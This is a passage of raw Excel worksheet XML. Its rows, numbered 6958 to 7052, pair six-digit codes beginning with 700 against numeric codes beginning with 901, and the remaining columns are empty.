      <c r="B6958" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6958" s="5"/>
      <c r="E6958" s="3"/>
      <c r="F6958" s="1"/>
      <c r="H6958" s="1"/>
    </row>
    <row r="6959" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6959" s="5">
        <v>700442</v>
      </c>
      <c r="B6959" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D6959" s="5"/>
      <c r="E6959" s="3"/>
      <c r="F6959" s="1"/>
      <c r="H6959" s="1"/>
    </row>
    <row r="6960" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6960" s="5">
        <v>700442</v>
      </c>
      <c r="B6960" s="3">
        <v>901059.005</v>
      </c>
      <c r="D6960" s="5"/>
      <c r="E6960" s="3"/>
      <c r="F6960" s="1"/>
      <c r="H6960" s="1"/>
    </row>
    <row r="6961" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6961" s="5">
        <v>700442</v>
      </c>
      <c r="B6961" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D6961" s="5"/>
      <c r="E6961" s="3"/>
      <c r="F6961" s="1"/>
      <c r="H6961" s="1"/>
    </row>
    <row r="6962" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6962" s="5">
        <v>700442</v>
      </c>
      <c r="B6962" s="3">
        <v>901105</v>
      </c>
      <c r="D6962" s="5"/>
      <c r="E6962" s="3"/>
      <c r="F6962" s="1"/>
      <c r="H6962" s="1"/>
    </row>
    <row r="6963" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6963" s="5">
        <v>700257</v>
      </c>
      <c r="B6963" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D6963" s="5"/>
      <c r="E6963" s="3"/>
      <c r="F6963" s="1"/>
      <c r="H6963" s="1"/>
    </row>
    <row r="6964" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6964" s="5">
        <v>700257</v>
      </c>
      <c r="B6964" s="3">
        <v>901560</v>
      </c>
      <c r="D6964" s="5"/>
      <c r="E6964" s="3"/>
      <c r="F6964" s="1"/>
      <c r="H6964" s="1"/>
    </row>
    <row r="6965" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6965" s="5">
        <v>700257</v>
      </c>
      <c r="B6965" s="3">
        <v>901123</v>
      </c>
      <c r="D6965" s="5"/>
      <c r="E6965" s="3"/>
      <c r="F6965" s="1"/>
      <c r="H6965" s="1"/>
    </row>
    <row r="6966" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6966" s="5">
        <v>700257</v>
      </c>
      <c r="B6966" s="3">
        <v>901119</v>
      </c>
      <c r="D6966" s="5"/>
      <c r="E6966" s="3"/>
      <c r="F6966" s="1"/>
      <c r="H6966" s="1"/>
    </row>
    <row r="6967" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6967" s="5">
        <v>700257</v>
      </c>
      <c r="B6967" s="3">
        <v>901115</v>
      </c>
      <c r="D6967" s="5"/>
      <c r="E6967" s="3"/>
      <c r="F6967" s="1"/>
      <c r="H6967" s="1"/>
    </row>
    <row r="6968" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6968" s="5">
        <v>700257</v>
      </c>
      <c r="B6968" s="3">
        <v>901140</v>
      </c>
      <c r="D6968" s="5"/>
      <c r="E6968" s="3"/>
      <c r="F6968" s="1"/>
      <c r="H6968" s="1"/>
    </row>
    <row r="6969" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6969" s="5">
        <v>700257</v>
      </c>
      <c r="B6969" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D6969" s="5"/>
      <c r="E6969" s="3"/>
      <c r="F6969" s="1"/>
      <c r="H6969" s="1"/>
    </row>
    <row r="6970" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6970" s="5">
        <v>700257</v>
      </c>
      <c r="B6970" s="3">
        <v>901105</v>
      </c>
      <c r="D6970" s="5"/>
      <c r="E6970" s="3"/>
      <c r="F6970" s="1"/>
      <c r="H6970" s="1"/>
    </row>
    <row r="6971" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6971" s="5">
        <v>700257</v>
      </c>
      <c r="B6971" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D6971" s="5"/>
      <c r="E6971" s="3"/>
      <c r="F6971" s="1"/>
      <c r="H6971" s="1"/>
    </row>
    <row r="6972" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6972" s="5">
        <v>700257</v>
      </c>
      <c r="B6972" s="3">
        <v>901027</v>
      </c>
      <c r="D6972" s="5"/>
      <c r="E6972" s="3"/>
      <c r="F6972" s="1"/>
      <c r="H6972" s="1"/>
    </row>
    <row r="6973" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6973" s="5">
        <v>700257</v>
      </c>
      <c r="B6973" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D6973" s="5"/>
      <c r="E6973" s="3"/>
      <c r="F6973" s="1"/>
      <c r="H6973" s="1"/>
    </row>
    <row r="6974" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6974" s="5">
        <v>700257</v>
      </c>
      <c r="B6974" s="3">
        <v>901057</v>
      </c>
      <c r="D6974" s="5"/>
      <c r="E6974" s="3"/>
      <c r="F6974" s="1"/>
      <c r="H6974" s="1"/>
    </row>
    <row r="6975" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6975" s="5">
        <v>700257</v>
      </c>
      <c r="B6975" s="3">
        <v>901113</v>
      </c>
      <c r="D6975" s="5"/>
      <c r="E6975" s="3"/>
      <c r="F6975" s="1"/>
      <c r="H6975" s="1"/>
    </row>
    <row r="6976" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6976" s="5">
        <v>700257</v>
      </c>
      <c r="B6976" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D6976" s="5"/>
      <c r="E6976" s="3"/>
      <c r="F6976" s="1"/>
      <c r="H6976" s="1"/>
    </row>
    <row r="6977" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6977" s="5">
        <v>700257</v>
      </c>
      <c r="B6977" s="3">
        <v>901082</v>
      </c>
      <c r="D6977" s="5"/>
      <c r="E6977" s="3"/>
      <c r="F6977" s="1"/>
      <c r="H6977" s="1"/>
    </row>
    <row r="6978" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6978" s="5">
        <v>700257</v>
      </c>
      <c r="B6978" s="3">
        <v>901016</v>
      </c>
      <c r="D6978" s="5"/>
      <c r="E6978" s="3"/>
      <c r="F6978" s="1"/>
      <c r="H6978" s="1"/>
    </row>
    <row r="6979" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6979" s="5">
        <v>700257</v>
      </c>
      <c r="B6979" s="3">
        <v>901033</v>
      </c>
      <c r="D6979" s="5"/>
      <c r="E6979" s="3"/>
      <c r="F6979" s="1"/>
      <c r="H6979" s="1"/>
    </row>
    <row r="6980" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6980" s="5">
        <v>700418</v>
      </c>
      <c r="B6980" s="3">
        <v>901433</v>
      </c>
      <c r="D6980" s="5"/>
      <c r="E6980" s="3"/>
      <c r="F6980" s="1"/>
      <c r="H6980" s="1"/>
    </row>
    <row r="6981" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6981" s="5">
        <v>700418</v>
      </c>
      <c r="B6981" s="3">
        <v>901418</v>
      </c>
      <c r="D6981" s="5"/>
      <c r="E6981" s="3"/>
      <c r="F6981" s="1"/>
      <c r="H6981" s="1"/>
    </row>
    <row r="6982" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6982" s="5">
        <v>700418</v>
      </c>
      <c r="B6982" s="3">
        <v>901429</v>
      </c>
      <c r="D6982" s="5"/>
      <c r="E6982" s="3"/>
      <c r="F6982" s="1"/>
      <c r="H6982" s="1"/>
    </row>
    <row r="6983" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6983" s="5">
        <v>700418</v>
      </c>
      <c r="B6983" s="3">
        <v>901512</v>
      </c>
      <c r="D6983" s="5"/>
      <c r="E6983" s="3"/>
      <c r="F6983" s="1"/>
      <c r="H6983" s="1"/>
    </row>
    <row r="6984" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6984" s="5">
        <v>700418</v>
      </c>
      <c r="B6984" s="3">
        <v>901412</v>
      </c>
      <c r="D6984" s="5"/>
      <c r="E6984" s="3"/>
      <c r="F6984" s="1"/>
      <c r="H6984" s="1"/>
    </row>
    <row r="6985" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6985" s="5">
        <v>700418</v>
      </c>
      <c r="B6985" s="3">
        <v>901533</v>
      </c>
      <c r="D6985" s="5"/>
      <c r="E6985" s="3"/>
      <c r="F6985" s="1"/>
      <c r="H6985" s="1"/>
    </row>
    <row r="6986" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6986" s="5">
        <v>700418</v>
      </c>
      <c r="B6986" s="3">
        <v>901447</v>
      </c>
      <c r="D6986" s="5"/>
      <c r="E6986" s="3"/>
      <c r="F6986" s="1"/>
      <c r="H6986" s="1"/>
    </row>
    <row r="6987" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6987" s="5">
        <v>700418</v>
      </c>
      <c r="B6987" s="3">
        <v>901476</v>
      </c>
      <c r="D6987" s="5"/>
      <c r="E6987" s="3"/>
      <c r="F6987" s="1"/>
      <c r="H6987" s="1"/>
    </row>
    <row r="6988" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6988" s="5">
        <v>700418</v>
      </c>
      <c r="B6988" s="3">
        <v>901430</v>
      </c>
      <c r="D6988" s="5"/>
      <c r="E6988" s="3"/>
      <c r="F6988" s="1"/>
      <c r="H6988" s="1"/>
    </row>
    <row r="6989" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6989" s="5">
        <v>700418</v>
      </c>
      <c r="B6989" s="3">
        <v>901444</v>
      </c>
      <c r="D6989" s="5"/>
      <c r="E6989" s="3"/>
      <c r="F6989" s="1"/>
      <c r="H6989" s="1"/>
    </row>
    <row r="6990" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6990" s="5">
        <v>700418</v>
      </c>
      <c r="B6990" s="3">
        <v>901544</v>
      </c>
      <c r="D6990" s="5"/>
      <c r="E6990" s="3"/>
      <c r="F6990" s="1"/>
      <c r="H6990" s="1"/>
    </row>
    <row r="6991" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6991" s="5">
        <v>700418</v>
      </c>
      <c r="B6991" s="3">
        <v>901437</v>
      </c>
      <c r="D6991" s="5"/>
      <c r="E6991" s="3"/>
      <c r="F6991" s="1"/>
      <c r="H6991" s="1"/>
    </row>
    <row r="6992" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6992" s="5">
        <v>700418</v>
      </c>
      <c r="B6992" s="3">
        <v>901508</v>
      </c>
      <c r="D6992" s="5"/>
      <c r="E6992" s="3"/>
      <c r="F6992" s="1"/>
      <c r="H6992" s="1"/>
    </row>
    <row r="6993" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6993" s="5">
        <v>700418</v>
      </c>
      <c r="B6993" s="3">
        <v>901426</v>
      </c>
      <c r="D6993" s="5"/>
      <c r="E6993" s="3"/>
      <c r="F6993" s="1"/>
      <c r="H6993" s="1"/>
    </row>
    <row r="6994" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6994" s="5">
        <v>700506</v>
      </c>
      <c r="B6994" s="3">
        <v>901433</v>
      </c>
      <c r="D6994" s="5"/>
      <c r="E6994" s="3"/>
      <c r="F6994" s="1"/>
      <c r="H6994" s="1"/>
    </row>
    <row r="6995" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6995" s="5">
        <v>700506</v>
      </c>
      <c r="B6995" s="3">
        <v>901432</v>
      </c>
      <c r="D6995" s="5"/>
      <c r="E6995" s="3"/>
      <c r="F6995" s="1"/>
      <c r="H6995" s="1"/>
    </row>
    <row r="6996" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6996" s="5">
        <v>700506</v>
      </c>
      <c r="B6996" s="3">
        <v>901429</v>
      </c>
      <c r="D6996" s="5"/>
      <c r="E6996" s="3"/>
      <c r="F6996" s="1"/>
      <c r="H6996" s="1"/>
    </row>
    <row r="6997" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6997" s="5">
        <v>700506</v>
      </c>
      <c r="B6997" s="3">
        <v>901512</v>
      </c>
      <c r="D6997" s="5"/>
      <c r="E6997" s="3"/>
      <c r="F6997" s="1"/>
      <c r="H6997" s="1"/>
    </row>
    <row r="6998" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6998" s="5">
        <v>700506</v>
      </c>
      <c r="B6998" s="3">
        <v>901412</v>
      </c>
      <c r="D6998" s="5"/>
      <c r="E6998" s="3"/>
      <c r="F6998" s="1"/>
      <c r="H6998" s="1"/>
    </row>
    <row r="6999" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6999" s="5">
        <v>700506</v>
      </c>
      <c r="B6999" s="3">
        <v>901533</v>
      </c>
      <c r="D6999" s="5"/>
      <c r="E6999" s="3"/>
      <c r="F6999" s="1"/>
      <c r="H6999" s="1"/>
    </row>
    <row r="7000" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7000" s="5">
        <v>700506</v>
      </c>
      <c r="B7000" s="3">
        <v>901476</v>
      </c>
      <c r="D7000" s="5"/>
      <c r="E7000" s="3"/>
      <c r="F7000" s="1"/>
      <c r="H7000" s="1"/>
    </row>
    <row r="7001" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7001" s="5">
        <v>700506</v>
      </c>
      <c r="B7001" s="3">
        <v>901407</v>
      </c>
      <c r="D7001" s="5"/>
      <c r="E7001" s="3"/>
      <c r="F7001" s="1"/>
      <c r="H7001" s="1"/>
    </row>
    <row r="7002" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7002" s="5">
        <v>700506</v>
      </c>
      <c r="B7002" s="3">
        <v>901430</v>
      </c>
      <c r="D7002" s="5"/>
      <c r="E7002" s="3"/>
      <c r="F7002" s="1"/>
      <c r="H7002" s="1"/>
    </row>
    <row r="7003" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7003" s="5">
        <v>700506</v>
      </c>
      <c r="B7003" s="3">
        <v>901444</v>
      </c>
      <c r="D7003" s="5"/>
      <c r="E7003" s="3"/>
      <c r="F7003" s="1"/>
      <c r="H7003" s="1"/>
    </row>
    <row r="7004" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7004" s="5">
        <v>700506</v>
      </c>
      <c r="B7004" s="3">
        <v>901507</v>
      </c>
      <c r="D7004" s="5"/>
      <c r="E7004" s="3"/>
      <c r="F7004" s="1"/>
      <c r="H7004" s="1"/>
    </row>
    <row r="7005" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7005" s="5">
        <v>700506</v>
      </c>
      <c r="B7005" s="3">
        <v>901426</v>
      </c>
      <c r="D7005" s="5"/>
      <c r="E7005" s="3"/>
      <c r="F7005" s="1"/>
      <c r="H7005" s="1"/>
    </row>
    <row r="7006" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7006" s="5">
        <v>700506</v>
      </c>
      <c r="B7006" s="3">
        <v>901422</v>
      </c>
      <c r="D7006" s="5"/>
      <c r="E7006" s="3"/>
      <c r="F7006" s="1"/>
      <c r="H7006" s="1"/>
    </row>
    <row r="7007" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7007" s="5">
        <v>700180</v>
      </c>
      <c r="B7007" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D7007" s="5"/>
      <c r="E7007" s="3"/>
      <c r="F7007" s="1"/>
      <c r="H7007" s="1"/>
    </row>
    <row r="7008" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7008" s="5">
        <v>700180</v>
      </c>
      <c r="B7008" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D7008" s="5"/>
      <c r="E7008" s="3"/>
      <c r="F7008" s="1"/>
      <c r="H7008" s="1"/>
    </row>
    <row r="7009" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7009" s="5">
        <v>700180</v>
      </c>
      <c r="B7009" s="3">
        <v>901140</v>
      </c>
      <c r="D7009" s="5"/>
      <c r="E7009" s="3"/>
      <c r="F7009" s="1"/>
      <c r="H7009" s="1"/>
    </row>
    <row r="7010" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7010" s="5">
        <v>700180</v>
      </c>
      <c r="B7010" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D7010" s="5"/>
      <c r="E7010" s="3"/>
      <c r="F7010" s="1"/>
      <c r="H7010" s="1"/>
    </row>
    <row r="7011" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7011" s="5">
        <v>700180</v>
      </c>
      <c r="B7011" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D7011" s="5"/>
      <c r="E7011" s="3"/>
      <c r="F7011" s="1"/>
      <c r="H7011" s="1"/>
    </row>
    <row r="7012" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7012" s="5">
        <v>700180</v>
      </c>
      <c r="B7012" s="3">
        <v>901083</v>
      </c>
      <c r="D7012" s="5"/>
      <c r="E7012" s="3"/>
      <c r="F7012" s="1"/>
      <c r="H7012" s="1"/>
    </row>
    <row r="7013" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7013" s="5">
        <v>700180</v>
      </c>
      <c r="B7013" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D7013" s="5"/>
      <c r="E7013" s="3"/>
      <c r="F7013" s="1"/>
      <c r="H7013" s="1"/>
    </row>
    <row r="7014" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7014" s="5">
        <v>700180</v>
      </c>
      <c r="B7014" s="3">
        <v>901105</v>
      </c>
      <c r="D7014" s="5"/>
      <c r="E7014" s="3"/>
      <c r="F7014" s="1"/>
      <c r="H7014" s="1"/>
    </row>
    <row r="7015" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7015" s="5">
        <v>700180</v>
      </c>
      <c r="B7015" s="3">
        <v>901036.00399999996</v>
      </c>
      <c r="D7015" s="5"/>
      <c r="E7015" s="3"/>
      <c r="F7015" s="1"/>
      <c r="H7015" s="1"/>
    </row>
    <row r="7016" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7016" s="5">
        <v>700180</v>
      </c>
      <c r="B7016" s="3">
        <v>901112</v>
      </c>
      <c r="D7016" s="5"/>
      <c r="E7016" s="3"/>
      <c r="F7016" s="1"/>
      <c r="H7016" s="1"/>
    </row>
    <row r="7017" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7017" s="5">
        <v>700180</v>
      </c>
      <c r="B7017" s="3">
        <v>901106</v>
      </c>
      <c r="D7017" s="5"/>
      <c r="E7017" s="3"/>
      <c r="F7017" s="1"/>
      <c r="H7017" s="1"/>
    </row>
    <row r="7018" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7018" s="5">
        <v>700180</v>
      </c>
      <c r="B7018" s="3">
        <v>901027</v>
      </c>
      <c r="D7018" s="5"/>
      <c r="E7018" s="3"/>
      <c r="F7018" s="1"/>
      <c r="H7018" s="1"/>
    </row>
    <row r="7019" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7019" s="5">
        <v>700180</v>
      </c>
      <c r="B7019" s="3">
        <v>901057</v>
      </c>
      <c r="D7019" s="5"/>
      <c r="E7019" s="3"/>
      <c r="F7019" s="1"/>
      <c r="H7019" s="1"/>
    </row>
    <row r="7020" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7020" s="5">
        <v>700180</v>
      </c>
      <c r="B7020" s="3">
        <v>901012</v>
      </c>
      <c r="D7020" s="5"/>
      <c r="E7020" s="3"/>
      <c r="F7020" s="1"/>
      <c r="H7020" s="1"/>
    </row>
    <row r="7021" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7021" s="5">
        <v>700180</v>
      </c>
      <c r="B7021" s="3">
        <v>901082</v>
      </c>
      <c r="D7021" s="5"/>
      <c r="E7021" s="3"/>
      <c r="F7021" s="1"/>
      <c r="H7021" s="1"/>
    </row>
    <row r="7022" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7022" s="5">
        <v>700180</v>
      </c>
      <c r="B7022" s="3">
        <v>901016</v>
      </c>
      <c r="D7022" s="5"/>
      <c r="E7022" s="3"/>
      <c r="F7022" s="1"/>
      <c r="H7022" s="1"/>
    </row>
    <row r="7023" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7023" s="5">
        <v>700180</v>
      </c>
      <c r="B7023" s="3">
        <v>901049</v>
      </c>
      <c r="D7023" s="5"/>
      <c r="E7023" s="3"/>
      <c r="F7023" s="1"/>
      <c r="H7023" s="1"/>
    </row>
    <row r="7024" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7024" s="5">
        <v>700180</v>
      </c>
      <c r="B7024" s="3">
        <v>901007</v>
      </c>
      <c r="D7024" s="5"/>
      <c r="E7024" s="3"/>
      <c r="F7024" s="1"/>
      <c r="H7024" s="1"/>
    </row>
    <row r="7025" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7025" s="5">
        <v>700366</v>
      </c>
      <c r="B7025" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D7025" s="5"/>
      <c r="E7025" s="3"/>
      <c r="F7025" s="1"/>
      <c r="H7025" s="1"/>
    </row>
    <row r="7026" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7026" s="5">
        <v>700366</v>
      </c>
      <c r="B7026" s="3">
        <v>901486</v>
      </c>
      <c r="D7026" s="5"/>
      <c r="E7026" s="3"/>
      <c r="F7026" s="1"/>
      <c r="H7026" s="1"/>
    </row>
    <row r="7027" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7027" s="5">
        <v>700366</v>
      </c>
      <c r="B7027" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D7027" s="5"/>
      <c r="E7027" s="3"/>
      <c r="F7027" s="1"/>
      <c r="H7027" s="1"/>
    </row>
    <row r="7028" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7028" s="5">
        <v>700366</v>
      </c>
      <c r="B7028" s="3">
        <v>901210</v>
      </c>
      <c r="D7028" s="5"/>
      <c r="E7028" s="3"/>
      <c r="F7028" s="1"/>
      <c r="H7028" s="1"/>
    </row>
    <row r="7029" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7029" s="5">
        <v>700366</v>
      </c>
      <c r="B7029" s="3">
        <v>901083</v>
      </c>
      <c r="D7029" s="5"/>
      <c r="E7029" s="3"/>
      <c r="F7029" s="1"/>
      <c r="H7029" s="1"/>
    </row>
    <row r="7030" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7030" s="5">
        <v>700366</v>
      </c>
      <c r="B7030" s="3">
        <v>901222.00100000005</v>
      </c>
      <c r="D7030" s="5"/>
      <c r="E7030" s="3"/>
      <c r="F7030" s="1"/>
      <c r="H7030" s="1"/>
    </row>
    <row r="7031" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7031" s="5">
        <v>700366</v>
      </c>
      <c r="B7031" s="3">
        <v>901564.00100000005</v>
      </c>
      <c r="D7031" s="5"/>
      <c r="E7031" s="3"/>
      <c r="F7031" s="1"/>
      <c r="H7031" s="1"/>
    </row>
    <row r="7032" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7032" s="5">
        <v>700366</v>
      </c>
      <c r="B7032" s="3">
        <v>901490</v>
      </c>
      <c r="D7032" s="5"/>
      <c r="E7032" s="3"/>
      <c r="F7032" s="1"/>
      <c r="H7032" s="1"/>
    </row>
    <row r="7033" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7033" s="5">
        <v>700366</v>
      </c>
      <c r="B7033" s="3">
        <v>901570</v>
      </c>
      <c r="D7033" s="5"/>
      <c r="E7033" s="3"/>
      <c r="F7033" s="1"/>
      <c r="H7033" s="1"/>
    </row>
    <row r="7034" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7034" s="5">
        <v>700366</v>
      </c>
      <c r="B7034" s="3">
        <v>901120</v>
      </c>
      <c r="D7034" s="5"/>
      <c r="E7034" s="3"/>
      <c r="F7034" s="1"/>
      <c r="H7034" s="1"/>
    </row>
    <row r="7035" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7035" s="5">
        <v>700366</v>
      </c>
      <c r="B7035" s="3">
        <v>901090.00300000003</v>
      </c>
      <c r="D7035" s="5"/>
      <c r="E7035" s="3"/>
      <c r="F7035" s="1"/>
      <c r="H7035" s="1"/>
    </row>
    <row r="7036" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7036" s="5">
        <v>700366</v>
      </c>
      <c r="B7036" s="3">
        <v>901563.00199999998</v>
      </c>
      <c r="D7036" s="5"/>
      <c r="E7036" s="3"/>
      <c r="F7036" s="1"/>
      <c r="H7036" s="1"/>
    </row>
    <row r="7037" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7037" s="5">
        <v>700366</v>
      </c>
      <c r="B7037" s="3">
        <v>901018</v>
      </c>
      <c r="D7037" s="5"/>
      <c r="E7037" s="3"/>
      <c r="F7037" s="1"/>
      <c r="H7037" s="1"/>
    </row>
    <row r="7038" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7038" s="5">
        <v>700366</v>
      </c>
      <c r="B7038" s="3">
        <v>901489</v>
      </c>
      <c r="D7038" s="5"/>
      <c r="E7038" s="3"/>
      <c r="F7038" s="1"/>
      <c r="H7038" s="1"/>
    </row>
    <row r="7039" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7039" s="5">
        <v>700366</v>
      </c>
      <c r="B7039" s="3">
        <v>901016</v>
      </c>
      <c r="D7039" s="5"/>
      <c r="E7039" s="3"/>
      <c r="F7039" s="1"/>
      <c r="H7039" s="1"/>
    </row>
    <row r="7040" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7040" s="5">
        <v>700366</v>
      </c>
      <c r="B7040" s="3">
        <v>901047</v>
      </c>
      <c r="D7040" s="5"/>
      <c r="E7040" s="3"/>
      <c r="F7040" s="1"/>
      <c r="H7040" s="1"/>
    </row>
    <row r="7041" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7041" s="5">
        <v>700612</v>
      </c>
      <c r="B7041" s="3">
        <v>901548.00199999998</v>
      </c>
      <c r="D7041" s="5"/>
      <c r="E7041" s="3"/>
      <c r="F7041" s="1"/>
      <c r="H7041" s="1"/>
    </row>
    <row r="7042" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7042" s="5">
        <v>700612</v>
      </c>
      <c r="B7042" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D7042" s="5"/>
      <c r="E7042" s="3"/>
      <c r="F7042" s="1"/>
      <c r="H7042" s="1"/>
    </row>
    <row r="7043" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7043" s="5">
        <v>700612</v>
      </c>
      <c r="B7043" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D7043" s="5"/>
      <c r="E7043" s="3"/>
      <c r="F7043" s="1"/>
      <c r="H7043" s="1"/>
    </row>
    <row r="7044" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7044" s="5">
        <v>700612</v>
      </c>
      <c r="B7044" s="3">
        <v>901486</v>
      </c>
      <c r="D7044" s="5"/>
      <c r="E7044" s="3"/>
      <c r="F7044" s="1"/>
      <c r="H7044" s="1"/>
    </row>
    <row r="7045" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7045" s="5">
        <v>700612</v>
      </c>
      <c r="B7045" s="3">
        <v>901140</v>
      </c>
      <c r="D7045" s="5"/>
      <c r="E7045" s="3"/>
      <c r="F7045" s="1"/>
      <c r="H7045" s="1"/>
    </row>
    <row r="7046" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7046" s="5">
        <v>700612</v>
      </c>
      <c r="B7046" s="3">
        <v>901083</v>
      </c>
      <c r="D7046" s="5"/>
      <c r="E7046" s="3"/>
      <c r="F7046" s="1"/>
      <c r="H7046" s="1"/>
    </row>
    <row r="7047" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7047" s="5">
        <v>700612</v>
      </c>
      <c r="B7047" s="3">
        <v>901222.00100000005</v>
      </c>
      <c r="D7047" s="5"/>
      <c r="E7047" s="3"/>
      <c r="F7047" s="1"/>
      <c r="H7047" s="1"/>
    </row>
    <row r="7048" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7048" s="5">
        <v>700612</v>
      </c>
      <c r="B7048" s="3">
        <v>901564.00100000005</v>
      </c>
      <c r="D7048" s="5"/>
      <c r="E7048" s="3"/>
      <c r="F7048" s="1"/>
      <c r="H7048" s="1"/>
    </row>
    <row r="7049" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7049" s="5">
        <v>700612</v>
      </c>
      <c r="B7049" s="3">
        <v>901564.00399999996</v>
      </c>
      <c r="D7049" s="5"/>
      <c r="E7049" s="3"/>
      <c r="F7049" s="1"/>
      <c r="H7049" s="1"/>
    </row>
    <row r="7050" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7050" s="5">
        <v>700612</v>
      </c>
      <c r="B7050" s="3">
        <v>901574.00100000005</v>
      </c>
      <c r="D7050" s="5"/>
      <c r="E7050" s="3"/>
      <c r="F7050" s="1"/>
      <c r="H7050" s="1"/>
    </row>
    <row r="7051" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7051" s="5">
        <v>700612</v>
      </c>
      <c r="B7051" s="3">
        <v>901490</v>
      </c>
      <c r="D7051" s="5"/>
      <c r="E7051" s="3"/>
      <c r="F7051" s="1"/>
      <c r="H7051" s="1"/>
    </row>
    <row r="7052" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7052" s="5">
        <v>700612</v>
      </c>
